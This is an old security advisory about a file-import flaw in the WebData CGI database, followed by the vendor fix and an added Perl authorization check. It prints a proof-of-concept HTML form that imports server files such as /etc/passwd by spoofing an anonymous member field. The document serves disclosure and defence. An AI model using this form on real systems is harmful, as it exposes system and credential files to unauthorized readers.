COMMAND
WebData
SYSTEMS AFFECTED
Webteachers WebData
PROBLEM
The following is based on Delphis Consulting Security Advisory
DST2K0039. Delphis Consulting Internet Security Team (DCIST)
discovered the following vulnerability in WebData under Linux
(although not tested under Windows NT, we would expect the same
results).
Any file on the file system that the web server user (e.g. nobody)
can read, such as /etc/passwd, can be imported into the WebData
database. This enables potential attackers to gain access to the
contents of a number of key files (e.g. hosts.allow, hosts.deny,
etc.) by browsing the database afterwards. Note: you need at least
a member account to perform this action.
The script below won't work as-is; it will require a little brain
power to get working with your database. It enables a user to
import anonymously any file that the web user has access to.
Example script:
<form action="http://127.0.0.1/cgi-bin/webdata_test.pl" method="post">
<INPUT TYPE=TEXT SIZE=60 NAME="pathname"><BR>
<font size=3>Is the file comma or tab delimited?</font>
<select name="delimiter" size=1>
<option value="comma">comma
<option value="tab">tab
<option value="pipe">pipe
</select>
<INPUT TYPE=HIDDEN NAME="member" VALUE="anonymous">
<input type=hidden name="cgifunction" value="import2">
<BR>
<INPUT TYPE=SUBMIT VALUE="Import">
</form>
SOLUTION
A new version of WebData has been released. The security problem
is addressed in the new version in the following manner.
Only the admin can use the "filename" method of importing.
Members must use the file upload method. The "enter the path to
the file" box does not appear on the import screen when the userid
is not "admin". The program also checks the userid during the
actual importing, so a hacker could not simply type the
query string for a file import into the location box.
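The server-side half of that fix, sketched as an added example (this
is not WebData's own code). It assumes the userid comes from the
server's login check rather than from the client-supplied "member"
field; authorize_import and the "upload" field name are hypothetical.

```perl
#!/usr/bin/perl
# Added illustration, not WebData's code: gate applied at import time.
use strict;
use warnings;

# Assumption: $auth_user is the userid established by the server-side
# login check. The "member" form field is client input and is ignored.
sub authorize_import {
    my ($auth_user, $params) = @_;

    return (0, 'not an import request')
        unless ($params->{cgifunction} // '') eq 'import2';

    my $by_path = defined $params->{pathname} && length $params->{pathname};

    # A path-based import reads server files as the web server user,
    # so it is allowed for the admin userid only.
    if ($by_path) {
        return (0, 'pathname import requires admin')
            unless defined $auth_user && $auth_user eq 'admin';
        return (1, 'admin pathname import');
    }

    # Members must use file upload; 'upload' is a hypothetical field name.
    return (1, 'upload import')
        if defined $auth_user && defined $params->{upload};
    return (0, 'no import source supplied');
}

# Constructed requests, modelled on the form fields in the advisory.
my @cases = (
    [ 'jdoe',  { cgifunction => 'import2', pathname => '/etc/passwd', member => 'anonymous' } ],
    [ 'jdoe',  { cgifunction => 'import2', pathname => '/etc/passwd', member => 'admin' } ],
    [ 'admin', { cgifunction => 'import2', pathname => '/data/customers.csv' } ],
    [ 'jdoe',  { cgifunction => 'import2', upload => 'rows.csv', delimiter => 'comma' } ],
);

for my $case (@cases) {
    my ($user, $params) = @$case;
    my ($ok, $why) = authorize_import($user, $params);
    printf "%-5s member=%-9s -> %s (%s)\n",
        $user, $params->{member} // '-', $ok ? 'ALLOW' : 'DENY', $why;
}
```

The second constructed request is the one that matters: the form claims
member=admin, but the decision follows the authenticated userid, so
hiding the path box in the import screen is not the only control.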